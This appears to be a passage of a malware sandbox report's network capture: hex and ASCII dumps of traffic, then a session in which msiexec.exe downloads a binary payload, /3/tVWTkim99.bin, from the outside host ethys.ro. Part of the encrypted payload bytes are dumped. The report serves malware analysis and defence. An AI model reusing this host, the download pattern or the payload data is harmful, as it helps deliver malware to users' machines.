                                                                                                    2024-10-23 15:22:38 UTC16384INData Raw: 63 51 47 62 36 77 4c 44 56 72 74 39 62 78 4d 41 36 77 4b 4c 54 58 45 42 6d 77 4e 63 4a 41 52 78 41 5a 74 78 41 5a 75 35 6f 4d 70 6f 36 6e 45 42 6d 33 45 42 6d 34 48 78 46 37 78 6d 62 6e 45 42 6d 2b 73 43 50 75 4f 42 77 55 6d 4a 38 58 76 72 41 75 4d 39 63 51 47 62 36 77 4b 70 36 33 45 42 6d 37 71 46 33 43 73 4b 36 77 49 39 7a 2b 73 43 47 46 68 78 41 5a 74 78 41 5a 73 78 79 75 73 43 74 43 5a 78 41 5a 75 4a 46 41 76 72 41 6a 55 5a 36 77 4a 4f 76 64 48 69 36 77 4b 38 30 58 45 42 6d 34 50 42 42 4f 73 43 75 73 6a 72 41 76 6d 37 67 66 6c 44 55 32 41 45 66 4d 72 72 41 6c 4f 36 63 51 47 62 69 30 51 6b 42 4f 73 43 6a 35 5a 78 41 5a 75 4a 77 2b 73 43 55 6d 56 78 41 5a 75 42 77 35 4d 68 64 77 48 72 41 6f 76 34 36 77 49 71 59 4c 6f 59 59 77 63 53 36 77 4c 4b 7a 75 73
                                                                                                    Data Ascii: cQGb6wLDVrt9bxMA6wKLTXEBmwNcJARxAZtxAZu5oMpo6nEBm3EBm4HxF7xmbnEBm+sCPuOBwUmJ8XvrAuM9cQGb6wKp63EBm7qF3CsK6wI9z+sCGFhxAZtxAZsxyusCtCZxAZuJFAvrAjUZ6wJOvdHi6wK80XEBm4PBBOsCusjrAvm7gflDU2AEfMrrAlO6cQGbi0QkBOsCj5ZxAZuJw+sCUmVxAZuBw5MhdwHrAov46wIqYLoYYwcS6wLKzus
                                                                                                    2024-10-23 15:22:38 UTC16384INData Raw: 46 64 31 39 76 34 4d 46 4a 4f 54 6c 70 71 37 4f 61 52 36 34 30 35 63 36 57 56 71 59 54 6e 39 43 63 51 51 67 6b 42 47 34 63 57 52 6d 5a 4f 4c 42 73 42 44 36 6e 56 33 35 31 45 45 43 51 71 51 4d 65 66 73 4a 64 49 42 79 57 62 49 4d 6d 7a 37 69 79 30 37 53 4f 4e 32 2f 4d 4e 58 61 30 36 67 32 36 64 4c 53 49 41 78 51 43 54 58 61 34 78 54 70 51 6c 41 46 55 39 4c 43 57 76 48 47 6f 4a 4b 38 53 2f 6b 72 65 33 64 73 75 76 52 6e 30 49 2f 72 58 66 59 58 42 34 57 64 38 54 4b 46 69 6a 33 57 50 51 4f 44 75 6e 36 5a 71 50 65 64 57 59 30 44 33 69 31 4c 50 4e 72 64 51 7a 6d 70 4e 51 30 34 6e 58 63 4b 71 54 74 37 6e 77 63 4c 54 6a 58 41 51 61 55 73 50 48 35 31 38 30 75 7a 2f 7a 73 31 4e 69 71 63 73 37 2f 61 62 54 4c 50 76 53 2f 59 42 42 6e 53 50 44 54 77 4f 6c 2f 61 31 33 39
                                                                                                    Data Ascii: Fd19v4MFJOTlpq7OaR6405c6WVqYTn9CcQQgkBG4cWRmZOLBsBD6nV351EECQqQMefsJdIByWbIMmz7iy07SON2/MNXa06g26dLSIAxQCTXa4xTpQlAFU9LCWvHGoJK8S/kre3dsuvRn0I/rXfYXB4Wd8TKFij3WPQODun6ZqPedWY0D3i1LPNrdQzmpNQ04nXcKqTt7nwcLTjXAQaUsPH5180uz/zs1Niqcs7/abTLPvS/YBBnSPDTwOl/a139
                                                                                                    2024-10-23 15:22:38 UTC16384INData Raw: 37 77 69 6e 7a 39 4c 6c 41 6b 54 57 51 56 48 50 57 36 57 55 4d 46 73 6b 55 30 62 4f 36 46 4c 50 57 36 32 70 6e 64 43 78 6e 38 35 62 4a 4b 78 36 78 79 52 54 7a 77 71 64 45 66 55 57 73 39 49 4f 75 6f 35 7a 6f 64 72 56 55 5a 37 6f 6e 39 49 6d 65 70 65 4e 63 51 79 34 32 69 68 53 4b 38 36 70 33 75 30 74 33 66 48 51 68 51 75 48 44 62 31 6d 50 75 75 72 32 4e 36 62 6d 35 54 4e 52 39 6f 74 54 59 6c 50 38 4d 35 51 50 79 55 73 57 6e 45 37 70 31 7a 39 78 33 30 52 45 38 38 6d 41 4e 6a 4b 6f 4c 37 53 73 69 63 53 6c 63 39 62 4b 39 79 34 50 43 52 54 6b 47 50 51 43 6b 36 30 32 31 50 50 57 33 4f 66 4a 53 69 68 78 30 32 68 6c 47 78 37 68 74 4b 43 4a 56 4d 4d 74 4b 77 6c 44 41 79 4b 38 41 76 68 62 61 38 71 49 30 49 45 70 73 2b 6c 35 4d 37 42 51 43 33 4b 68 35 61 62 6d 4b 78
                                                                                                    Data Ascii: 7winz9LlAkTWQVHPW6WUMFskU0bO6FLPW62pndCxn85bJKx6xyRTzwqdEfUWs9IOuo5zodrVUZ7on9ImepeNcQy42ihSK86p3u0t3fHQhQuHDb1mPuur2N6bm5TNR9otTYlP8M5QPyUsWnE7p1z9x30RE88mANjKoL7SsicSlc9bK9y4PCRTkGPQCk6021PPW3OfJSihx02hlGx7htKCJVMMtKwlDAyK8Avhba8qI0IEps+l5M7BQC3Kh5abmKx
                                                                                                    2024-10-23 15:22:38 UTC16384INData Raw: 6d 6f 44 58 6d 4e 72 53 73 49 46 46 74 41 52 54 30 73 4e 53 2b 4d 61 68 67 72 56 66 2b 7a 42 6f 63 71 4b 66 48 6b 70 6f 4c 36 62 30 4d 43 37 57 74 58 64 4a 75 42 46 78 38 48 32 33 35 62 71 2b 55 51 54 48 39 54 79 75 76 31 2b 49 51 57 4a 61 47 44 74 53 34 39 70 5a 4c 36 46 4e 4a 46 50 41 31 70 56 6b 7a 31 74 37 30 72 49 54 73 51 37 50 57 79 76 58 37 4d 30 6c 55 35 47 7a 42 76 58 4e 57 36 31 51 6d 65 56 63 69 74 4c 6c 70 62 32 38 49 30 6a 7a 54 71 33 49 30 44 30 6d 70 5a 58 59 52 5a 6a 4d 6e 63 65 74 73 63 35 70 75 64 59 77 49 69 71 78 53 2f 38 6c 75 4c 51 38 5a 68 31 5a 6d 33 7a 63 64 38 43 49 63 4e 59 6d 4a 6f 6d 5a 6a 38 37 50 4c 53 36 71 76 38 6e 51 62 6e 38 59 6a 39 62 6f 54 34 49 64 67 4a 58 66 2f 77 32 63 34 4a 6c 48 75 4e 69 6c 6f 49 67 46 6d 45 70
                                                                                                    Data Ascii: moDXmNrSsIFFtART0sNS+MahgrVf+zBocqKfHkpoL6b0MC7WtXdJuBFx8H235bq+UQTH9Tyuv1+IQWJaGDtS49pZL6FNJFPA1pVkz1t70rITsQ7PWyvX7M0lU5GzBvXNW61QmeVcitLlpb28I0jzTq3I0D0mpZXYRZjMncetsc5pudYwIiqxS/8luLQ8Zh1Zm3zcd8CIcNYmJomZj87PLS6qv8nQbn8Yj9boT4IdgJXf/w2c4JlHuNiloIgFmEp
                                                                                                    2024-10-23 15:22:38 UTC16384INData Raw: 44 5a 71 68 6a 48 48 66 30 67 6d 35 65 31 6b 38 32 75 49 7a 53 4a 41 31 32 76 47 43 47 69 2b 77 56 33 7a 37 37 35 50 61 36 78 74 4c 64 63 49 67 58 53 6f 4c 43 76 42 72 50 6c 48 30 49 69 4f 6c 6a 33 46 2f 68 41 69 46 79 7a 6c 68 4f 51 6c 76 65 61 49 4e 54 6d 38 41 48 30 4b 4a 53 77 46 31 75 51 69 77 38 4e 72 57 79 51 43 74 54 39 49 39 65 42 74 55 46 39 72 57 39 61 70 4a 71 4e 72 56 45 65 43 66 4e 38 69 6b 57 31 6b 79 32 4a 55 5a 2b 4c 7a 65 39 7a 78 2b 78 5a 31 50 5a 44 48 59 67 4a 77 6f 38 70 41 61 34 57 76 75 47 68 37 56 44 58 34 43 64 71 6b 49 61 39 48 61 35 62 44 34 65 4d 6e 53 44 6e 43 34 39 7a 73 4e 75 4e 6f 70 55 69 72 4f 53 6f 4e 64 65 44 61 49 72 45 38 58 2b 71 50 6f 33 54 51 6d 46 6b 43 4b 6a 4e 6a 39 30 36 4b 71 4c 66 6f 55 54 45 52 35 56 69 44
                                                                                                    Data Ascii: DZqhjHHf0gm5e1k82uIzSJA12vGCGi+wV3z775Pa6xtLdcIgXSoLCvBrPlH0IiOlj3F/hAiFyzlhOQlveaINTm8AH0KJSwF1uQiw8NrWyQCtT9I9eBtUF9rW9apJqNrVEeCfN8ikW1ky2JUZ+Lze9zx+xZ1PZDHYgJwo8pAa4WvuGh7VDX4CdqkIa9Ha5bD4eMnSDnC49zsNuNopUirOSoNdeDaIrE8X+qPo3TQmFkCKjNj906KqLfoUTER5ViD
                                                                                                    2024-10-23 15:22:38 UTC16384INData Raw: 74 4d 47 2b 34 5a 79 68 65 73 31 62 4a 46 67 7a 6a 32 72 53 73 69 2f 58 55 4d 39 62 4b 39 36 64 74 64 75 73 54 75 34 4e 55 63 39 62 77 38 6f 33 59 4b 53 6f 72 74 71 52 65 73 31 62 4a 48 31 32 76 67 37 57 44 54 32 68 69 30 37 32 44 56 48 50 57 35 75 50 42 67 53 6b 71 65 63 5a 32 39 37 6d 57 53 52 54 75 71 78 6d 30 72 49 72 55 76 6a 50 57 79 76 65 6c 6f 51 6e 55 77 68 5a 6d 31 6d 4d 31 71 56 68 51 41 6e 6f 4c 32 5a 48 39 54 4c 2b 32 68 61 43 4c 57 67 55 31 79 76 61 46 6c 6f 42 6f 4c 6f 31 53 6f 47 6c 6b 52 53 69 4e 46 52 4f 73 66 4f 71 33 31 78 33 36 4d 52 62 4a 46 4e 4f 6f 4b 70 4a 48 67 30 72 33 6d 65 47 4a 31 4f 55 6e 43 5a 54 4f 6b 70 64 30 76 30 4b 5a 48 6e 7a 59 38 72 53 7a 53 6f 50 64 32 76 61 44 6e 59 55 71 79 4e 71 42 5a 79 68 70 4d 35 62 4a 4f 6a
                                                                                                    Data Ascii: tMG+4Zyhes1bJFgzj2rSsi/XUM9bK96dtdusTu4NUc9bw8o3YKSortqRes1bJH12vg7WDT2hi072DVHPW5uPBgSkqecZ297mWSRTuqxm0rIrUvjPWyveloQnUwhZm1mM1qVhQAnoL2ZH9TL+2haCLWgU1yvaFloBoLo1SoGlkRSiNFROsfOq31x36MRbJFNOoKpJHg0r3meGJ1OUnCZTOkpd0v0KZHnzY8rSzSoPd2vaDnYUqyNqBZyhpM5bJOj
                                                                                                    2024-10-23 15:22:38 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 44 58 4f 4e 6f 55 48 64 4a 71 39 64 63 66 58 76 31 79 32 56 34 4a 68 75 35 4e 49 64 63
                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADXONoUHdJq9dcfXv1y2V4Jhu5NIdc
                                                                                                    2024-10-23 15:22:38 UTC16384INData Raw: 71 52 66 35 2f 43 4b 6c 6b 65 45 30 6d 5a 52 4f 73 5a 4d 33 33 52 78 7a 7a 30 61 38 4a 55 52 53 33 76 63 6f 30 51 32 75 2b 6e 48 4b 55 2b 4b 49 63 61 38 63 37 6c 71 49 4b 44 6e 39 4d 46 69 4f 50 42 59 51 46 61 54 76 4f 74 4c 35 51 43 4c 42 50 54 78 61 79 66 6b 53 49 46 42 31 47 4f 65 4b 38 61 30 61 41 68 36 78 59 45 75 59 65 7a 58 79 2f 38 73 4a 51 4e 7a 6b 56 4d 39 62 72 77 7a 6e 30 72 74 44 78 31 73 6b 58 4d 35 45 37 56 50 50 57 79 52 54 7a 31 73 6b 55 38 39 62 4a 46 50 50 57 79 52 54 7a 31 73 6b 55 38 39 62 4a 43 57 43 39 63 4f 6e 45 46 6b 54 46 30 70 69 30 61 65 64 50 61 38 4d 79 54 32 74 7a 41 74 63 4a 46 4e 45 78 4f 42 55 7a 31 75 74 7a 41 74 63 4a 46 4e 45 42 48 53 55 69 41 73 57 54 69 37 6f 64 75 6b 78 55 66 70 4c 54 71 6c 57 5a 65 66 38 70 61 48
                                                                                                    Data Ascii: qRf5/CKlkeE0mZROsZM33Rxzz0a8JURS3vco0Q2u+nHKU+KIca8c7lqIKDn9MFiOPBYQFaTvOtL5QCLBPTxayfkSIFB1GOeK8a0aAh6xYEuYezXy/8sJQNzkVM9brwzn0rtDx1skXM5E7VPPWyRTz1skU89bJFPPWyRTz1skU89bJCWC9cOnEFkTF0pi0aedPa8MyT2tzAtcJFNExOBUz1utzAtcJFNEBHSUiAsWTi7odukxUfpLTqlWZef8paH
                                                                                                    2024-10-23 15:22:38 UTC16384INData Raw: 57 79 51 38 64 36 57 45 30 72 66 31 2f 38 5a 5a 31 36 4e 32 4d 35 59 74 42 69 54 4d 54 4f 32 51 2f 69 74 53 33 31 55 6b 55 38 39 62 4a 46 50 50 57 79 52 54 7a 31 73 6b 55 38 39 62 4a 46 50 50 57 79 52 54 7a 31 74 4d 68 43 78 2b 31 57 78 64 72 6f 56 65 43 50 6f 7a 4d 70 4b 4c 7a 52 31 36 33 35 4b 34 64 59 57 76 78 4a 39 54 4a 46 50 4d 7a 43 52 62 7a 31 74 32 30 71 4a 37 5a 46 50 4f 57 33 50 73 6f 39 4f 2b 66 45 36 63 34 78 77 53 58 4b 57 6b 62 6c 31 6f 34 45 36 63 53 6e 45 4c 49 48 54 50 52 72 73 6c 61 31 49 39 48 59 4f 39 54 39 42 58 63 68 4b 69 6c 61 42 7a 61 77 4b 62 4c 52 70 70 56 39 41 4c 2b 6b 6c 75 50 6c 37 4d 36 2f 73 35 74 54 4d 41 55 6f 4b 4e 77 54 6d 5a 63 71 57 74 33 59 79 6f 56 4a 66 61 57 53 4e 54 73 53 52 54 77 4e 2f 54 48 63 78 62 65 77 56
                                                                                                    Data Ascii: WyQ8d6WE0rf1/8ZZ16N2M5YtBiTMTO2Q/itS31UkU89bJFPPWyRTz1skU89bJFPPWyRTz1tMhCx+1WxdroVeCPozMpKLzR1635K4dYWvxJ9TJFPMzCRbz1t20qJ7ZFPOW3Pso9O+fE6c4xwSXKWkbl1o4E6cSnELIHTPRrsla1I9HYO9T9BXchKilaBzawKbLRppV9AL+kluPl7M6/s5tTMAUoKNwTmZcqWt3YyoVJfaWSNTsSRTwN/THcxbewV
                                                                                                    2024-10-23 15:22:38 UTC16384INData Raw: 45 43 48 65 48 61 50 54 56 73 57 48 41 68 45 44 68 56 62 52 37 57 46 41 5a 6d 74 66 32 50 41 43 38 42 35 4c 72 46 4a 7a 5a 31 59 41 42 52 4d 56 66 51 58 52 6a 55 64 30 42 48 41 43 63 62 6f 6d 32 74 4d 66 56 42 4b 6c 30 67 69 77 46 67 78 59 43 72 6a 61 4c 6c 6f 64 7a 6b 75 4c 56 45 55 62 6e 33 4f 54 47 75 33 69 70 50 68 6c 51 4b 34 31 4f 56 66 62 41 43 6e 4e 69 4e 6d 77 59 50 4b 4b 2f 56 6d 67 58 43 76 30 4e 66 4c 6a 30 51 71 70 33 76 51 4d 52 4e 35 68 55 63 39 62 36 48 4b 4a 45 63 77 36 46 44 43 4f 72 65 4f 64 50 6d 36 69 74 58 6c 30 4d 4c 44 4a 49 73 50 57 74 6a 32 58 78 31 47 46 33 44 4f 72 51 72 31 4c 74 64 4b 48 59 50 61 37 35 36 67 6d 55 77 50 77 79 55 44 4e 33 38 78 74 77 6a 71 49 4f 61 52 43 4c 55 62 72 6d 38 6b 39 70 55 67 4f 73 41 48 72 43 71 43
                                                                                                    Data Ascii: ECHeHaPTVsWHAhEDhVbR7WFAZmtf2PAC8B5LrFJzZ1YABRMVfQXRjUd0BHACcbom2tMfVBKl0giwFgxYCrjaLlodzkuLVEUbn3OTGu3ipPhlQK41OVfbACnNiNmwYPKK/VmgXCv0NfLj0Qqp3vQMRN5hUc9b6HKJEcw6FDCOreOdPm6itXl0MLDJIsPWtj2Xx1GF3DOrQr1LtdKHYPa756gmUwPwyUDN38xtwjqIOaRCLUbrm8k9pUgOsAHrCqC


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.94992581.180.144.1244437800C:\Windows\SysWOW64\msiexec.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-23 15:23:14 UTC168OUTGET /3/tVWTkim99.bin HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                    Host: ethys.ro
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-10-23 15:23:14 UTC404INHTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    content-type: application/octet-stream
                                                                                                    last-modified: Wed, 23 Oct 2024 09:02:09 GMT
                                                                                                    accept-ranges: bytes
                                                                                                    content-length: 494656
                                                                                                    date: Wed, 23 Oct 2024 15:23:14 GMT
                                                                                                    server: LiteSpeed
                                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                    2024-10-23 15:23:15 UTC16384INData Raw: 9b 60 f4 2e c1 8b 4c 47 18 e0 07 5c dc e7 8b 4d bf f0 aa 73 96 5b 62 e1 49 02 29 17 a9 37 e2 66 42 23 f8 d8 96 58 f2 c1 41 50 01 ae d8 44 52 0c 57 03 cc b0 a6 89 73 42 14 a6 3c b7 30 8a 4d eb e8 8d 09 f3 27 b3 bb 76 73 b3 96 1d 1f e9 b2 e9 76 90 b8 01 5a 6c 0b b9 fd e7 97 ff 66 ed b9 63 76 9a e9 ea de f3 94 86 7d 52 00 8f 62 ce 1e d4 6c 53 49 c3 b7 73 48 be 2e 11 c4 f9 d1 3d 6c 25 ee e8 ed f0 2c b1 72 cc a7 85 1f a1 a7 a0 cc dd 73 c9 98 11 fa 1d 2c 13 af 22 da 40 12 ef 20 48 ef 8a 3c 17 09 b4 8c ae 3a 2d 4e 37 b1 e4 3b 33 38 82 af 99 f4 5d 91 a1 f2 e1 ac c9 21 e1 34 4c 56 a2 c2 f7 ad 7f 77 7d ca 7b 6d 8b be ef 1e a3 07 c1 04 4a 01 f9 c7 47 63 6c db 1c 5c 0c e2 41 e8 bc 0c e5 d8 5a 40 89 48 0b 57 2f 46 f2 39 45 6a 76 8d dd b9 7f f7 6a 48 48 ce f4 ae fd bd
                                                                                                    Data Ascii: `.LG\Ms[bI)7fB#XAPDRWsB<0M'vsvZlfcv}RblSIsH.=l%,rs,"@ H<:-N7;38]!4LVw}{mJGcl\AZ@HW/F9EjvjHH
                                                                                                    2024-10-23 15:23:15 UTC16384INData Raw: 36 dc a9 4a 97 f2 25 79 81 af fd dc 49 0d 87 bd c3 9d 5e 80 d7 52 93 f3 ee ba 3f 33 f2 f1 13 17 a4 c5 d7 ea 97 df cb f3 ea 52 02 e9 bd 1e 91 a1 65 21 69 f2 33 83 84 a0 9a 3e c6 6c 77 23 f3 43 df 77 a2 c9 2d 96 1d 78 91 60 67 fe e5 cf 65 d0 22 80 4d 6d 03 15 b3 62 71 b3 80 19 7b ce 11 88 ea c2 6d 26 91 28 c0 fb ce f1 fd f3 26 19 28 52 b0 64 28 b4 ca a4 f0 64 d2 0e f9 65 cd a8 ee 71 ea 4a 43 68 77 97 58 97 34 a3 10 09 42 85 6d 88 e2 cb 3e 63 71 a6 8c e6 66 fb 83 31 a7 8d ee 87 2d c4 d9 11 9c 98 89 f8 17 9a e7 ff 66 01 99 6e d2 27 34 a0 31 0d 3e f5 98 d0 3c 3e 99 86 da 4a 6d e7 dd 75 3e 3f 49 83 68 4f fe 4f 68 4e 9a 20 12 42 26 3c f3 74 60 58 8d 6f 6d a1 d1 ee 46 3d 27 53 75 4c ce 68 55 4c a9 d9 50 9e 69 90 e1 e3 6d 51 19 55 60 df 4d 36 c8 61 ef 77 56 00 ae
                                                                                                    Data Ascii: 6J%yI^R?3Re!i3>lw#Cw-x`ge"Mmbq{m&(&(Rd(deqJChwX4Bm>cqf1-fn'41><>Jmu>?IhOOhN B&<t`XomF='SuLhULPimQU`M6awV
                                                                                                    2024-10-23 15:23:15 UTC16384INData Raw: 8c a7 af 40 e7 6b e4 b9 25 ac 71 5c 5e 06 2b 7f cc 21 58 5e 69 88 5e f5 c7 ba a1 41 e8 61 e4 71 5e 92 66 45 de 93 dd 27 1c 9f 0f 82 75 77 14 39 f2 85 4f ad 1e 5f ae 3f 9e d8 ed 56 79 18 ae 38 61 d7 5f 9b 0a a7 54 ba fa eb 4a 9b e0 f0 d1 93 a3 00 4f ea dc f8 e8 b2 02 f2 5e d9 c4 c5 56 1b 5e a0 6a 41 19 60 26 e2 de 25 95 c1 2e 32 37 fa fe 79 ce e8 f3 04 28 d9 31 a8 6a f4 39 56 59 93 54 89 07 80 98 66 21 db 70 09 59 02 5f 7d 27 27 17 5e ff 34 b1 b0 14 c6 ee a5 5a 4c 66 36 03 cb 66 21 9c 8d 32 13 94 94 f3 3b 00 9a a9 c1 70 45 74 5c 3a f2 01 98 9c 2c 5b 2b fc 6c e0 70 0e f2 e8 c3 ba 30 85 23 88 bf 96 10 19 af ba 62 2f f6 8f 8f 9c fd 3b bd 5b 6a 63 55 c2 9c 48 db 34 59 89 df 3d 1e 40 c6 d3 54 39 fe 91 72 6a 49 08 01 78 97 0a f6 70 7e 8f f8 29 9e be 32 af cf ee
                                                                                                    Data Ascii: @k%q\^+!X^i^Aaq^fE'uw9O_?Vy8a_TJO^V^jA`&%.27y(1j9VYTf!pY_}''^4ZLf6f!2;pEt\:,[+lp0#b/;[jcUH4Y=@T9rjIxp~)2
                                                                                                    2024-10-23 15:23:15 UTC16384INData Raw: ea 94 39 86 c7 6f dd e0 2e da 78 28 41 44 d3 ce cf 69 dd 62 91 47 d3 af 5b e5 44 f4 b0 e2 a4 6d 16 cc 58 ad b7 28 ac 54 71 78 56 5b 52 ae ce 09 95 7c 84 64 62 1e 54 5c 15 09 83 45 a5 b7 1d 2e 56 e2 60 d6 d0 be b2 e4 5a ac e7 42 1c 7c 66 a3 89 d5 d9 88 a5 d8 5d 2f ba b7 14 85 2f 49 04 70 f1 a0 6c d0 58 de c6 8b bb a7 18 e9 ae 23 70 01 e5 5e da 6e 81 b9 0e 88 dd 61 48 56 75 3d f8 98 86 3a 24 cb 8c 19 fe d8 39 d9 2f 11 87 41 f9 5c 16 25 03 d3 61 3d e1 c1 da 6a 96 63 87 71 a5 fb 34 b1 0a 99 6a 8a 72 b3 32 ed eb d4 ad 1d 68 74 d6 f0 e5 82 e2 a6 eb d4 5c 2f 8e 78 73 b8 a7 b1 f6 17 ef 74 eb 5f 85 51 eb 39 73 ec 44 1b 11 3f f5 70 d9 2b cc 7d 87 5e a3 ba 78 eb 5b 17 2c 88 4c c6 96 2e fe 16 b3 31 6f e8 e9 1b 6c 0b b9 3e 21 8f 76 13 e5 3a a4 6e 13 94 02 35 2a 17 cb
                                                                                                    Data Ascii: 9o.x(ADibG[DmX(TqxV[R|dbT\E.V`ZB|f]//IplX#p^naHVu=:$9/A\%a=jcq4jr2ht\/xst_Q9sD?p+}^x[,L.1ol>!v:n5*
                                                                                                    2024-10-23 15:23:15 UTC16384INData Raw: 15 ff 0d b0 58 22 da 90 b6 62 2a 0f 9e be 63 7e 6d b8 b3 50 f1 ad 48 79 7c a5 e1 c7 98 8e 25 c1 bc 73 63 48 0b 14 51 55 6f b3 03 7f 4c f5 aa 83 70 44 6e 9f 4d 27 ad 0e 22 5d c3 fa b4 d7 2a 00 ee d7 5d 9d 51 ac ec b5 27 64 59 11 bd aa 85 4a 18 bb 91 0d 4d 91 fe 9b b1 39 f7 17 20 c6 c4 a2 aa 0d e5 51 f3 53 f7 0a 70 ca bd a9 c5 d4 3f 35 0c 22 71 5e 04 72 c4 35 99 47 a5 36 15 7f 64 99 08 7c e8 36 8b 27 4a e7 72 0d 36 22 f0 a5 16 12 f7 00 74 42 40 1e 08 a5 a8 52 f1 a6 0e e7 d4 57 25 3b 37 03 a5 8f 42 3c f8 42 7c a2 fd d6 00 8a ef c4 e5 d5 24 5e 9c aa 97 d6 6d d3 70 8b 5c bf cb c8 a8 9a 57 d1 78 7c 4d aa ba 73 08 90 d4 69 a8 0b fe b1 42 35 47 56 bd e6 66 6d d8 0d 0e a1 64 04 bb c1 cb ec 52 67 80 e5 ca ef 64 71 9a b6 21 14 82 8a e2 cd 3b 8b 95 0c 9f e4 43 a8 33
                                                                                                    Data Ascii: X"b*c~mPHy|%scHQUoLpDnM'"]*]Q'dYJM9 QSp?5"q^r5G6d|6'Jr6"tB@RW%;7B<B|$^mp\Wx|MsiB5GVfmdRgdq!;C3
                                                                                                    2024-10-23 15:23:15 UTC16384INData Raw: f1 ea aa e8 1f 91 f6 1e 24 93 8a 33 e2 2b 93 d8 b9 46 41 07 42 41 19 f9 ea 04 36 c3 ef 02 e0 7c 91 a1 72 58 20 82 42 1d dc fd 6a 02 74 b9 bb 8e 7e 27 88 21 c2 25 ea 47 9c 82 4b 47 08 27 ce fc d5 06 0d da 9f 49 5e 60 34 9a b1 8f 78 9a 11 c9 c7 ab 5f a6 93 2f 4e e0 ac c9 a2 9d 10 68 4a d6 f8 57 e4 65 a1 69 80 3b dd cc e0 81 c2 65 c4 60 23 34 b3 63 10 39 9f 69 82 46 9b 16 bf 53 30 0e a3 d7 aa 70 1d 8b 2d 45 71 55 8a 17 9a 2b 39 05 93 27 a6 64 21 14 28 e1 14 0f b1 e6 6b e4 32 2a dd 1f 80 16 7c 0c 3d d4 3f 8d d2 d0 ae 0d ba 7d 2b 87 06 e8 ec ed 9c b9 16 ec 45 36 8b b4 35 ec 9f 4d f6 4f f4 f7 96 31 03 e2 09 3a 7b 58 77 5a fc 06 9f 96 35 c4 b5 b7 05 2c 8b b2 8b 7a 44 d2 e5 0e da 74 e7 eb de d7 17 5a 72 48 ed 00 cf 50 79 ad df 48 64 0e 6f 58 29 c6 87 9b 74 ff 96
                                                                                                    Data Ascii: $3+FABA6|rX Bjt~'!%GKG'I^`4x_/NhJWei;e`#4c9iFS0p-EqU+9'd!(k2*|=?}+E65MO1:{XwZ5,zDtZrHPyHdoX)t
                                                                                                    2024-10-23 15:23:15 UTC16384INData Raw: 40 c3 1e 56 fb ee 82 d5 ed d8 0a 21 a3 fe 66 54 f7 46 be 3b ff 07 78 97 5a fd cc 21 e6 71 fc 29 4a a8 61 25 f7 97 de c4 a2 cb bd aa a1 07 3c 0a 56 5b 6a a6 48 c8 66 fb 5e e8 cf 81 7b 1b 9b 51 26 06 d2 d2 ad b8 cc 07 62 56 66 99 31 00 bd 77 32 14 98 55 f2 16 28 a2 87 33 cb 82 0e dc dd 1d 5d 98 4a 45 c8 4a 08 53 80 c5 f6 e6 10 79 72 fc f4 48 d7 30 b8 7d 9a ce ab 5f 77 e0 be 4d e3 18 ed f2 d6 66 46 08 00 8d 8b fa a5 ab cd 68 b6 c0 02 8e 18 23 d8 d2 bc 53 da 29 f2 ff 6f 95 e0 70 49 86 d7 48 4a ee 94 c3 69 92 15 6a ff a8 7f a3 4d eb f6 50 58 e8 49 0e e7 39 06 c3 26 78 46 de b1 e3 5e 8a 95 45 9a 9d 5a 58 bf 75 c5 af 82 8d 09 27 89 ac 67 34 86 35 04 77 11 2f 33 fe 99 13 cf e0 58 ae a7 d3 6b 71 d2 d9 b3 3e 25 56 04 95 c2 30 81 ba 25 c8 57 53 71 ae ab c1 85 9f 01
                                                                                                    Data Ascii: @V!fTF;xZ!q)Ja%<V[jHf^{Q&bVf1w2U(3]JEJSyrH0}_wMfFh#S)opIHJijMPXI9&xF^EZXu'g45w/3Xkq>%V0%WSq
                                                                                                    2024-10-23 15:23:15 UTC16384INData Raw: 7d b6 0f 0e 9c 69 9c 88 8e f1 1e 9d 8e f5 65 6f a3 d9 41 1f 4d b2 46 be 95 7f fe 84 4b 3c e1 3c ad e2 cc 30 f5 bc 55 40 5f 63 b7 c0 27 eb da aa 13 ac e3 3b 52 96 40 ff 55 5d 86 a5 46 cb 66 8f c7 8a 0b cf 06 d1 f3 70 5d e0 ef c1 7e 55 8c c0 4b 0a 25 54 da c4 30 5a 53 6c 6f 58 c2 34 23 e7 d3 00 49 65 60 6f 5c a7 2a b0 31 4d 75 2a 54 e1 3f 01 71 12 2d 4d 5c df 8b 42 f0 00 36 f7 74 81 15 b1 e6 78 c6 54 72 b9 1a d5 da 75 f3 fe 3a 10 3a 4f fd a7 54 b7 79 61 68 55 4b c0 40 de d1 2e 25 2d 2f 60 79 f1 85 bb 5b 66 80 84 7f 19 e1 c4 e6 6a 25 b8 4e 72 4a 81 39 f0 3c 9c 50 0a 91 a2 e2 77 7c 82 3e e2 21 ed 05 